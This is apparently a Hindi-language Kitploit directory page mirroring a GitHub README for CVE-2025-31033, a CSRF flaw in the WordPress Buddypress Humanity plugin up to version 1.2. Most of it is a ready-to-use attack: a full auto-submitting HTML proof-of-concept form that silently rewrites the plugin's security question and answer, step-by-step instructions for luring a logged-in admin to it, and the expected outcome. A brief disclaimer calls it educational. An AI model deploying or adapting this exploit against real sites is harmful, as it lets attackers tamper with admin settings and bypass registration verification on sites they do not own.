Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-31033 — WordPress Buddypress Humanity Plugin <= 1.2 Cross Site Request Forgery (CSRF) के लिए संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-31033
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेपर और शोधलर्निंग और शिक्षा
GitHubnxploited/cve-2025-31033

CVE-2025-31033

WordPress Buddypress Humanity Plugin <= 1.2 Cross Site Request Forgery (CSRF) के लिए संवेदनशील है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

⚠️ CVE-2025-31033 - WordPress Buddypress Humanity प्लगइन में CSRF (<= 1.2)

🛡️ भेद्यता सारांश

WordPress के लिए Buddypress Humanity प्लगइन (संस्करण <= 1.2) क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) के लिए कमजोर है।
यह कमजोरी एक हमलावर को उच्च विशेषाधिकार वाले उपयोगकर्ता (जैसे, एडमिन) को अनजाने में प्लगइन सेटिंग्स (जैसे सुरक्षा प्रश्न और उत्तर) को संशोधित करने के लिए मजबूर करने की अनुमति देती है, तथा उपयोगकर्ता सत्यापन तर्क को दरकिनार कर देती है।


🐞 भेद्यता प्रकार

  • क्रॉस साइट रिक्वेस्ट फोर्जरी (CSRF)
  • प्रभावित घटक: bph-settings पृष्ठ (केवल एडमिन)
  • CVE: CVE-2025-31033
  • जोखिम CVSS 9.8

🚨 प्रभाव

यदि सफलतापूर्वक शोषण किया जाता है, तो यह कमजोरी हमलावरों को निम्नलिखित की अनुमति देती है:

  • उपयोगकर्ता पंजीकरण के दौरान उपयोग किए जाने वाले सुरक्षा प्रश्न और उत्तर को बदलना
  • नया उत्तर जानकर मानवता सत्यापन को बायपास करना
  • उपयोगकर्ता पंजीकरण को स्वचालित करना (संभवतः विशेषाधिकार वृद्धि के साथ संयुक्त)
  • उपयोगकर्ता इंटरैक्शन के बिना पंजीकरण फ़ॉर्म सुरक्षा का दुरुपयोग करना

  • 🎯 प्रभावित प्लगइन

    • नाम: Buddypress Humanity
    • संस्करण: ≤ 1.2
    • स्लग: buddypress-humanity
    • परीक्षण किया गया: WordPress 6.x + BuddyPress सक्रिय

    💥 प्रूफ ऑफ कॉन्सेप्ट (HTML एक्सप्लॉइट)

    root@kitploit:~
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <title>Exploit – CVE-2025-31033</title>
    </head>
    <body onload="document.forms[0].submit();">
      <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
        <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
        <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
        <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
        <input type="hidden" name="bph_submit" value="1">
      </form>
    </body>
    </html>
    

    ☠️ एक बार जब यह पृष्ठ किसी प्रमाणित एडमिन द्वारा खोला जाता है, तो यह चुपचाप प्लगइन सेटिंग्स को संशोधित कर देता है।


    🔧 शोषण कैसे करें

    1. PoC HTML को किसी बाहरी सर्वर पर होस्ट करें।
    2. किसी लॉग-इन WordPress एडमिन को पृष्ठ पर जाने के लिए प्रेरित करें।
    3. विज़िट करने पर, उनका ब्राउज़र चुपचाप फ़ॉर्म सबमिट कर देगा।
    4. प्लगइन का सुरक्षा प्रश्न और उत्तर अपडेट हो जाएगा।
    5. हमलावर अब ज्ञात उत्तर का उपयोग करके पंजीकरण कर सकता है।

    🧪 सफल शोषण के परिणाम:

    • संशोधित प्रश्न: I'm Nxploited | Khaled Alenazi
    • संशोधित उत्तर: Nxploit
    • कोई भी उपयोगकर्ता जो "Nxploit" दर्ज करेगा, सत्यापन को बायपास कर देगा।

    ⚠️ अस्वीकरण

    यह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक उद्देश्यों के लिए है।
    जिम्मेदारी से उपयोग करें और उन सिस्टमों पर परीक्षण न करें जिनके आप मालिक नहीं हैं।
    लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


    👤 द्वारा

    Nxploited | Khaled Alenazi

    टूल डाउनलोड करें